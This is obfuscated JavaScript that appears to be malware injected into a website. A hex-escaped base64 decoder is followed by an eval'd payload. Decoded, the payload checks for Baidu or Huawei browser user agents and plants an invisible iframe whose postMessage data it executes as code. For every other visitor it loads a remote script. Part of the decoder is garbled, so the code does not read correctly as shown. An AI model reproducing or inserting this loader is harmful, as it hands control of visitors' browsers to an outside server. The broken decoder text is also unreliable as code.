eval("\x77\x69\x6e\x64\x6f\x77")["\x6E\x70\x6C\x73"]=function(e){var sp =''+'ABCDEFGHIJKL'+'MNOPQRSTUVWXY'+'Zabcdefgh'+'ijklmnopqrs'+'tuvwxyz0123456'+'789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x41\x73\x58\x70\x50\x73\x6C\x6E\x5A"]=function(){eval(npls("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQobnBscyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKG5wbHMoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihucGxzKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbbnBscygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKG5wbHMoZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyc9JysnPXdNTScrJ3kwU00nKydNJysnNWtUTU0nKyd0TScrJ01tUicrJ3lVQ01NJysndDVXWjAnKydNTWonKydSeVV5JysnTU0wUUQnKydNTXgnKydFJysnME0nKydNbCcrJzAyJysnYmo1aWEnKyczJysnVlcnKydlJysnMGQnKydYJysnWnUnKydjJysnM2QnKyczWmsnKydNTWxZJysna00nKydNbCcrJ0UnKycwTU0nKydsTScrJ01IYzBSJysnSCcrJ2EnKycnKycnLCcnKydJZ0snKydsanMnKydBZScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydhdmQnKydlTXgnKyc1JysnJysnJywnTScp"));}